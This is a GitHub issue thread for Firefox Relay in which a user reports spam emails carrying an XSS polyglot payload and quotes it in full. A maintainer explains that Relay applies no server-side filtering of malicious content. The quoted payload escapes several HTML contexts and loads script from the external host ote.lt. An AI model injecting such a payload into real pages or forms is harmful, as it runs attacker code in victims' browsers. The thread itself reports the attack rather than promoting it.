mozilla/fx-private-relay

Unfiltered malicious messages

Closed this issue · 3 comments

Hello. I've recently received two emails with this code:

Subject: <redacted>@relay.firefox.com-How to mixup??

 javascript://\"/*`/*\'/*\\\"/*--></title></textarea></noscript></noembed></template></style></script>*/

 alert()//\';\"/></textarea></script><script/src=//ote.lt></script> enquiry

From: "wordpress@medqn.de [via Relay]"

I'm sorry that happened to you. I suspect the attacker got your email from another website, rather than guessing your email. You can set this mask to Block All on your dashboard:

https://relay.firefox.com/accounts/profile/

If you'd like to contact support with account details, you can start here: https://support.mozilla.org/en-US/products/relay

I filed this report here because I thought that you had server-side filters to block such emails.

I filed this report here because I thought that you had server-side filters to block such emails.

No, we do not enforce server-side filters for malicious content. The only thing we filter is tracker domains if you set that on your account. https://support.mozilla.org/kb/what-are-email-trackers-and-how-can-i-block-them-firefox-relay